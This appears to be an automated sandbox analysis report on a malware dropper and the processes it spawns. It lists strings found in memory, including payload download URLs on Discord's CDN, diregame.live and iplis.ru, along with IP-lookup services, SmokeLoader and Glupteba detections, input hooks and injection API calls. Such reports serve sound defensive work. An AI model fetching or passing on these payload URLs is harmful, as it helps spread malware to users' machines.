      Source: yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe.
      Source: yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe2
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeC
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeJ
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeL
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exet
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exex
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmp
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpC
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpC:
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpLMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpk
      Source: yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpl
      Source: yevbZfdCqR.exe, 00000001.00000003.658455877.0000000005B37000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.657251202.0000000005B33000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmp
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpC
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpC:
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpLMEM
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpN
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpS
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpeerqD$
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpnt=1LMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpxeH
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ones
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ttachments/849802777433341954/849807598056112138/Setup2.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ttachments/855697945679888404/856207959917985862/file3s.bmptoolspab2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/849807598056112138/Setup2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exeE
      Source: yevbZfdCqR.exe, 00000001.00000002.753162388.0000000004F00000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.e
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp4
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmpD#
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmpq
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmpd
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://wP
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1eLMEM
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1eLMEM
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/%kS
      Source: Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feec
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feec/?v=2000
      Source: Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecC:
      Source: Browzar.exe, 0000001D.00000003.736411062.0000000005CAB000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecD
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecV
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecXo
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecbygoogle.js
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushers
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: https://d.dirdgame.live/
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753214699.0000000004F40000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exe
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEM
      Source: md8_8eus.exe, 00000023.00000003.950342573.0000000003FE0000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://humisnee.com/sb.phpincompatible
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
      Source: yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753268870.0000000004F72000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.754193678.0000000005EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1G8Fx7.mp3
      Source: yevbZfdCqR.exe, 00000001.00000002.754205295.0000000005EB7000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1G8Fx7.mp3~
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.754193678.0000000005EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1SBms7.mp3
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/J
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/W
      Source: yevbZfdCqR.exe, 00000001.00000002.753268870.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/n
      Source: yevbZfdCqR.exe, 00000001.00000002.753025081.0000000004E8A000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru:443/1G8Fx7.mp3i/getData.php
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live/
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exedll
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live:80/
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live:80/m
      Source: yevbZfdCqR.exe, 00000001.00000002.749730612.0000000000F9B000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live:80/userf/2201/google-game.exei
      Source: yevbZfdCqR.exe, 00000001.00000002.749686234.0000000000F76000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live:80/userf/2201/google-game.exet
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      Yara detected SmokeLoader
      Source: Yara match | File source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: C:\Program Files (x86)\Browzar\Browzar.exe | Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll

      E-Banking Fraud:

      Yara detected Glupteba
      Source: Yara match | File source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara match | File source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE

      System Summary:

      .NET source code contains very large array initializations
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.cs | Large array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.cs | Large array initialization: .cctor: array initializer size 58666
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: .cctor: array initializer size 58666
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: .cctor: array initializer size 58666
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 379880
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: .cctor: array initializer size 58666
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 379880
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs | Large array initialization: .cctor: array initializer size 58666
      .NET source code contains very large strings
      Source: 6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.cs | Long String: Length: 172980
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.cs | Long String: Length: 172980
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_01229070 __aulldiv,VirtualAlloc,__aulldiv,VirtualAlloc,__aulldiv,NtQuerySystemInformation,__aulldiv,NtQuerySystemInformation,WideCharToMultiByte,CharToOemA,WideCharToMultiByte,CharToOemA,_strstr,__aulldiv,VirtualFree,VirtualFree,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe | Code function: 6_2_01473D00 NtAllocateVirtualMemory,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe | Code function: 6_2_01473C00 NtUnmapViewOfSection,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe | Code function: 6_2_01473BF9 NtUnmapViewOfSection,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe | Code function: 6_2_01473CF9 NtAllocateVirtualMemory,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00429348
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004793DD
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0047D6AF
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045976E
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_014717F7
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00408F20
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6C284
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C64568
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6E641
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6E650
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: String function: 01252ED0 appears 39 times
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: String function: 0128A42C appears 39 times
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: String function: 0040E1D8 appears 44 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0046E270 appears 50 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0042A1C4 appears 97 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00404694 appears 125 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0046834C appears 34 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00468161 appears 41 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00401016 appears 52 times
      Source: file9[1].exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yevbZfdCqR.exe, 00000001.00000002.752819876.0000000004B30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.653217379.0000000005DFD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemfx_mft_vp9vd.dllB vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752950283.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752950283.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameLandscaped.exe4 vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.748519721.0000000000F10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749490073.0000000000F20000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.748502456.0000000000F00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752871216.0000000004B50000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs yevbZfdCqR.exe
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Section loaded: starttiledata.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe Section loaded: starttiledata.dll
      Source: yevbZfdCqR.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
